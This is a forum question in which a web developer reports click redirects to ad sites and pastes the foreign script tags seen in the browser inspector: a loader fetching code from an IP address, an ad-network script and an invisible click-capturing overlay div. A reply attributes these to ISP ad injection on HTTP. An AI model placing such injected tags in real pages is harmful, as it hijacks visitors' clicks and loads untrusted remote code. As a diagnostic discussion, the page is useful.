Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

unknown scripts are running and redirecting on click to unknown websties

Problem:- Sometimes, on clicking on NAVBAR menu or on any div on my bootstrap website, It redirects to ads or unknown links in new tab something like this.

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Imported links from hosted file:-

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

What I got in Inspection:-

I checked my code multiple times when there is no redirect on clicking menu..I found nothing suspicious... BUT THEN when I got redirect links on click, I checked my code in browser and I can clearly see few script sources added to my files( Can see in Inspection mode in browsers only).They are not Written to my code. Unknown parts of my code are..

1) HERE The following 2 scripts are replacing script js/jquery.min.js in head tag

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) This one is being added to body tag right after I imported google api

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>

3) This one is also in body tag.

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>

4) On inspecting The redirect link. The HEADERS info:-

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

What I have tried:-

My code is clean and there is no script which is redirecting it to somewhere. It may be my browser or Windows being compromised .I checked website from 3 browsers EDGE, CHROME, FIREFOX .. got same problem. then I upgraded to Windows 10 from Win7 and did a fresh install. But nothing happened. Then I thought of asking Hostgator support if server is compromised they replied its okay from their end... I installed malwarebytes and all softwares to solve it...but they just notify that chrome / firefox / Edge is redirecting to outbound ID with some domain name mostly go.oclasrv.com and do nothing.

**

ANY SOLUTION???

**

UPDATE:-

I got similar redirect on Hostgator support feedback link..

On noticing, Here the domain name in string is replaced by rateus.in zoneid=1492761 is same whatever unsecure link I open.. also cb=xxxxxxxxxxxx and tm=xxxxxxxxxxx is changed for different links and fingerprint=c2VwLW5vLXJlZGlyZWN0 is same for all links I open.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

My OS is completely upgraded to WIN10 pro and I have installed only Chrome without any plugins...

The problem is browser independent as I got same results on EDGE and Firefox.

ANY JS EXPERT WHO CAN HELP ME OUT HERE

like image 240
aman Avatar asked Jun 27 '18 14:06

aman


1 Answers

This seems to be a case of ISP injecting JavaScript files. Are you by any chance on the BSNL broadband?. For last few days, BSNL seems to be injecting Adware on HTTP(non encrypted) sites.

The only solution I know is to host your site on https OR change your ISP.

like image 141
Jayson Chacko Avatar answered Oct 02 '22 20:10

Jayson Chacko